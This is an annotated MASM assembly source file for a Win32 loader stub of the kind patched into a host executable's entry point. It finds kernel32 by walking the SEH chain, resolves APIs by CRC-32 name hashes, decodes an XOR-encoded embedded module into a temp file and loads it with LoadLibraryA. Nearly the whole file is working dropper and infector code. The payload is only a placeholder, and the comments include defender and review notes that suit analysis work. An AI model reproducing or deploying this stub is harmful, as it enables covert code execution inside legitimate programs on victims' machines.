; MASM (Intel syntax), 32-bit x86, flat memory model, stdcall Win32 ABI.
; .486p also enables the privileged 486 instructions; casemap:none makes
; symbol names case-sensitive -- relevant here because the API names passed
; to APIDEF are hashed character by character, so their spelling is data.
.486p
.model flat, stdcall
option casemap :none
;--------------------------------------------------------
; CRC16 name -- assemble-time hash of the characters of <name>, emitted as
; one dword. Despite the macro's name this is the 32-bit reflected CRC
; (polynomial 0EDB88320h, initial value and final xor 0FFFFFFFFh), i.e. the
; same bit-serial CRC-32 that GetApiAddressFromList recomputes over export
; names at runtime.
; NOTE(review): the runtime loop also folds the name's terminating NUL byte
; into its hash, while this macro iterates only the visible characters; the
; two therefore appear to disagree -- confirm against the assembled list.
CRC16 MACRO string
;; crc = 0FFFFFFFFh
CRC_VALUE = 0ffffffffh
;; one character of the argument text per iteration
IRPC CRC_BYTE, string
CRC_VALUE = CRC_VALUE xor '&CRC_BYTE'
;; eight bit-serial steps per byte: branch-free form of
;; "shift right; if the bit shifted out was 1, xor the polynomial"
REPT 8
CRC_VALUE = (CRC_VALUE shr 1) xor ((CRC_VALUE and 1) * 0edb88320h)
ENDM
ENDM
;; final complement
CRC_VALUE = CRC_VALUE xor 0ffffffffh
;; mask keeps the emitted constant at 32 bits whatever width the
;; assembler evaluates expressions in
dd (CRC_VALUE and 0ffffffffh)
ENDM
APIDEF MACRO apiname
;; Emit the CRC of the API name into the list being assembled and bind the
;; name to the next ebp-relative dword slot; COUNT advances by one dword.
CRC16 apiname
apiname = [ebp + COUNT]
COUNT = COUNT + 4
ENDM
VARDEF MACRO varsym, nbytes
;; Reserve nbytes of frame space: varsym becomes the current ebp offset
;; and COUNT moves past the reserved bytes.
varsym = COUNT
COUNT = COUNT + nbytes
ENDM
;--------------------------------------------------------
.CODE ; single code segment: the hash list at vdelta and the payload at ModuleEntry are emitted into it as well
;****************************************************************************
; _MiniLoaderStart -- the stub the host jumps to before its own entry point.
;   1. SubEnter saves all registers and installs an SEH frame, so any fault
;      in the body lands in SubLeave and control returns to the host.
;   2. Walks the SEH chain to its last record and takes that handler's
;      address as "an address inside kernel32", then scans downwards in
;      64 KiB steps for an 'MZ'/'PE' header to get the module base into edx.
;      NOTE(review): whether the final handler really lives in kernel32
;      depends on the Windows version; if it does not, the export lookup
;      finds nothing for these hashes -- confirm on the versions of interest.
;   3. Resolves the six kernel32 exports hashed at KNLAPILIST into the
;      ebp-relative slots bound by APIDEF (see vdelta / COUNT).
;   4. Creates a temp file (GetTempFileNameA, prefix "SH"), writes the
;      embedded module to it after XOR-3Ch decoding in 1000h-byte chunks,
;      closes it and hands the path to LoadLibraryA.
;   5. HostReturn drops the frame and continues in SubLeave, which `ret`s
;      into the dword patched in at HostEntryPoint.
; Defender notes: the observable artefacts are a dropped file in the temp
; directory whose name begins with "SH", a LoadLibraryA on that path,
; direct fs:[0] writes (SubEnter) and the CRC export walk
; (GetApiAddressFromList).
; Stack: `enter 80h` gives 128 bytes of locals; below them two 260-byte
; path buffers and a 1000h-byte staging buffer, all released by `leave`.
; Clobbers: everything; SubEnter's pushad/popad restores the host's view.
;****************************************************************************
_MiniLoaderStart:
push 12345678h ; placeholder return target -- presumably overwritten with the host's original entry when the stub is attached
HostEntryPoint = $ - 4 ; offset of that immediate for whoever patches it
call SubEnter ; pushad + SEH frame; SubEnter jumps back here with esp = SEH record, ebx = 0
mov eax, esp ; eax = current SEH record (fs:[0] points at it)
xchg esi, eax ; loop body: esi = record
lodsd ; eax = record->prev, esi = &record->handler
cmp eax, -1 ; 0FFFFFFFFh marks the last record of the chain
jne $ - 5 ; back to the xchg (assumes xchg = 1 byte and cmp = 3 bytes -- verify the assembled sizes)
mov edx, [esi] ; edx = handler of the last record, an address inside the module that registered it
SearchKernel32:
dec edx ; step below the current 64 KiB block ...
xor dx, dx ; ... and round down to a 64 KiB boundary (image-base granularity)
cmp word ptr [edx], 'ZM' ; DOS "MZ" signature?
jne SearchKernel32
mov ecx, [edx + 3ch] ; e_lfanew
cmp dword ptr [edx + ecx], 'EP' ; "PE\0\0" signature? then edx = image base (assumed kernel32)
jne SearchKernel32 ; no probe: an unmapped gap in the scan faults into the SEH frame and aborts to the host
call $ + 5 ; push the address of the following pop
pop eax ; eax = runtime address of `pop eax`
sub eax, $ - vdelta - 1 ; eax = runtime address of vdelta ($ - 1 is the pop); relocation delta for all data references
enter 80h, 0 ; frame with 80h bytes for the API slots and locals laid out by COUNT
mov [ebp + var_delta], eax ; stored, but not read again in this file
lea esi, [eax + KNLAPILIST - vdelta] ; esi = runtime hash list
mov edi, esp ; edi = ebp - 80h = first API slot (COUNT starts at -80h)
call GetApiAddressFromList ; edx = module base; fills the slots; restores esi/edi
mov edi, 260 ; MAX_PATH
sub esp, edi ; buffer for the temp directory
push esp ;lpBuffer
push edi ;nBufferLength
call GetTempPathA ; indirect call through the slot APIDEF bound
mov eax, esp ; eax = temp directory
sub esp, edi ; buffer for the temp file name
push esp ;lpTempFileName
push 0 ;wUnique = 0: the API picks the name and creates the (empty) file
call $ + 8 ;lpPrefixString = address of the inline "SH" below
db "SH", 0
push eax ;lpszPath
call GetTempFileNameA
mov eax, esp ; eax = the temp file name (stdcall callee popped its arguments)
push ebx ;hTemplateFile = NULL (ebx is 0 since SubEnter)
push ebx ;dwFlagsAndAttributes = 0
push 2 ;CREATE_ALWAYS
push ebx ;lpSecurityAttributes = NULL
push 0 ;dwShareMode = 0
push 40000000h ;GENERIC_WRITE
push eax ;lpFileName
call CreateFileA
mov [ebp + var_hFile], eax
inc eax ; INVALID_HANDLE_VALUE (-1) -> 0
jz HostReturn ; could not create the file: give up (the empty file from GetTempFileNameA is left behind)
sub esi, KNLAPILIST - ModuleEntry ; esi = runtime ModuleEntry (GetApiAddressFromList left esi at KNLAPILIST)
lodsd ; eax = module length in bytes
xchg ebx, eax ; ebx = bytes remaining
sub esp, 1000h ; 4 KiB staging buffer
mov edi, esp
LoopDecryptModule:
mov ecx, 1000h ; ecx = min(1000h, ebx)
cmp ebx, ecx
jnb $ + 4 ; skip the 2-byte mov below when a full chunk remains
mov ecx, ebx
push ecx ; chunk length
push edi ; chunk start
lodsb
xor al, 3ch ; decode one byte of the embedded module
stosb
loop $ - 4 ; back to lodsb (a zero-length module makes ecx wrap and the loop run 2^32 times -- no guard)
pop edi
pop ecx
sub ebx, ecx ; remaining -= chunk
push esp ; scratch dword that receives lpNumberOfBytesWritten
mov eax, esp
push 0 ;lpOverlapped
push eax ;lpNumberOfBytesWritten
push ecx ;nNumberOfBytesToWrite
push edi ;lpBuffer
push dword ptr [ebp + var_hFile] ;hFile
call WriteFile ; neither the return value nor the byte count is checked: a short or failed write is silently accepted
pop eax ; drop the scratch dword
test ebx, ebx
jnz LoopDecryptModule
add esp, 1000h ; esp back to the file-name buffer
push dword ptr [ebp + var_hFile] ;hFile
call CloseHandle
push esp ;lpLibFileName = the temp file name
call LoadLibraryA ; load the dropped module (result unused)
HostReturn:
leave ; drop the 80h frame and everything allocated below it
jmp SubLeave ; restore fs:[0] and the registers, then ret to the host entry
;****************************************************************************
; SubEnter / SubLeave / InstallSEH -- register save and SEH framing around
; the loader body.
; SubEnter (called from _MiniLoaderStart): pushad, ebx = 0, then InstallSEH
;   registers an SEH record at esp whose handler is the `pop eax` below and
;   jumps back to the caller with that record on top of the stack.
; Handler path: the OS calls the record's handler as
;   handler(ExceptionRecord, EstablisherFrame, Context, Dispatcher); the code
;   at `pop eax` drops the return address and ExceptionRecord, sets esp to
;   EstablisherFrame (= the record) and falls into SubLeave -- the exception
;   is abandoned by resetting esp, not unwound.
; SubLeave (also the normal exit from HostReturn): restores fs:[0], discards
;   InstallSEH's return address, popad, discards `call SubEnter`'s return
;   address and `ret`s into the dword pushed at HostEntryPoint.
; Stack at InstallSEH's jmp: [esp] previous fs:[0], [esp+4] handler,
;   [esp+8..+27h] pushad image, [esp+28h] return address of `call SubEnter`.
; Defender notes: a direct write to fs:[0] and a handler that never returns
;   to the dispatcher are both signature-worthy; if the host image was
;   linked with SafeSEH this handler is not in its table and would not run.
;****************************************************************************
SubEnter:
pushad ; save the host's registers (restored by popad in SubLeave)
xor ebx, ebx ; ebx = 0: fs:[ebx] below, and NULL/0 for the caller's pushes
call InstallSEH ; pushes the address of the next line -- that becomes the SEH handler
pop eax ; --- handler entry: drop the dispatcher's return address
pop eax ; drop ExceptionRecord
pop esp ; esp = EstablisherFrame (the record InstallSEH built); fall through
SubLeave:
xor ebx, ebx
pop dword ptr fs:[ebx] ; restore the previous SEH head
pop eax ; drop the handler address (InstallSEH's return address)
popad ; host registers back
add esp, 4 ; drop `call SubEnter`'s return address
ret ; pops the value pushed at HostEntryPoint -> continue in the host
InstallSEH:
push dword ptr fs:[ebx] ; record.prev = current head
mov fs:[ebx], esp ; fs:[0] = &record; record.handler is the return address pushed by `call InstallSEH`
jmp [esp + 28h] ; resume in _MiniLoaderStart after `call SubEnter` (layout above)
;****************************************************************************
; GetApiAddressFromList -- resolve exported functions by a hash of their name.
; In:  edx = base of the module whose export table is walked
;      esi = list of dword hashes (see CRC16 / APIDEF), terminated by a 0 dword
;      edi = destination: one dword per hash receives the function address
; Out: the dwords at edi are written; every register, esi and edi included,
;      is restored by pushad/popad (the caller relies on esi = list start).
; Hash: bit-serial reflected CRC-32 (polynomial 0EDB88320h, initial value
;      and final complement 0FFFFFFFFh) over the export name INCLUDING its
;      NUL terminator (see the note at `test ch, ch`). The exact variant
;      fixes which names match which constants -- useful when writing a
;      signature for this resolver.
; Invariants: ebp is the name-table index and is NOT reset between hashes,
;      so the hash list must be ordered like the export name table
;      (ascending by name; the list at KNLAPILIST is alphabetical). There is
;      no bound against NumberOfNames and forwarded exports are not handled.
; Clobbers: memory at edi only.
;****************************************************************************
GetApiAddressFromList:
pushad
mov ecx, [edx + 3ch] ; e_lfanew
add ecx, edx ; ecx = IMAGE_NT_HEADERS
mov ebx, [ecx + 78h] ; export directory RVA (DataDirectory[0])
add ebx, edx ; ebx = IMAGE_EXPORT_DIRECTORY
or ebp, -1 ; ebp = -1: name index, pre-incremented below (no frame pointer in here)
SearchNextAPI:
mov ecx, [ebx + 20h] ; AddressOfNames RVA
add ecx, edx
ContinueSearch:
inc ebp ; next name (continues from the previous match, see invariants)
mov eax, edx
add eax, [ecx + ebp * 4] ; eax = export name string
pushad ; eax/ecx/edx are scratch for the hash; popad brings edx (base) back
or edx, -1 ; crc = 0FFFFFFFFh
@1:
mov ch, [eax] ; ch = next byte; cl is reused as the bit counter, the halves do not collide
inc eax
xor dl, ch
mov cl, 8
@2:
shr edx, 1
jnc @3
xor edx, 0edb88320h ; reflected CRC-32 polynomial
@3:
dec cl
jnz @2
test ch, ch ; NOTE(review): checked after the byte was folded in, so the NUL is part of the hash; the CRC16 macro stops before it -- the two appear to disagree, confirm
jnz @1
not edx ; final complement
cmp [esi], edx ; flags survive popad
popad
jne ContinueSearch
mov eax, [ebx + 24h] ; AddressOfNameOrdinals RVA
add eax, edx
movzx eax, word ptr [eax + ebp * 2] ; ordinal index for this name
mov ecx, [ebx + 1ch] ; AddressOfFunctions RVA
add ecx, edx
mov eax, [ecx + eax * 4] ; function RVA
add eax, edx ; -> VA
stosd ; store into the caller's slot
lodsd ; advance to the next hash
cmp dword ptr [esi], 0 ; the list ends with a 0 dword
jne SearchNextAPI
popad
ret
;********************************************************
; vdelta -- anchor for runtime relocation: _MiniLoaderStart computes the
; runtime address of this label and addresses KNLAPILIST and ModuleEntry
; relative to it. The hash list below is data emitted in the code segment.
;********************************************************
vdelta:
COUNT = -80h ; ebp-relative cursor for the frame built by `enter 80h, 0`; slots run upwards from ebp-80h
KNLAPICALL = COUNT ; start of the API slots (not referenced elsewhere in this file)
KNLAPILIST:
; Hash list consumed by GetApiAddressFromList: each APIDEF emits one dword
; hash here and binds the symbol to its [ebp + offset] slot. The order must
; match the export name table (alphabetical) -- see GetApiAddressFromList.
APIDEF CloseHandle
APIDEF CreateFileA
APIDEF GetTempFileNameA
APIDEF GetTempPathA
APIDEF LoadLibraryA
APIDEF WriteFile
dd 00h ; list terminator
VARDEF var_delta, 4 ; runtime address of vdelta
VARDEF var_hFile, 4 ; handle of the dropped file
;--------------------------------------------------------
_MiniLoaderCodeEnd: ; end of the stub proper; presumably where a builder appends the real payload
ModuleEntry: ; dword length, then `length` bytes XOR-encoded with 3Ch (decoded in LoopDecryptModule)
dd 00000001h ; placeholder payload: length 1 ...
db 00h ; ... and one byte (decodes to 3Ch) -- a stand-in, not a loadable module
;--------------------------------------------------------
start: ; image entry for a standalone build: runs the loader, which then `ret`s into the 12345678h placeholder at HostEntryPoint, so this build only works once that dword is patched
jmp _MiniLoaderStart
end start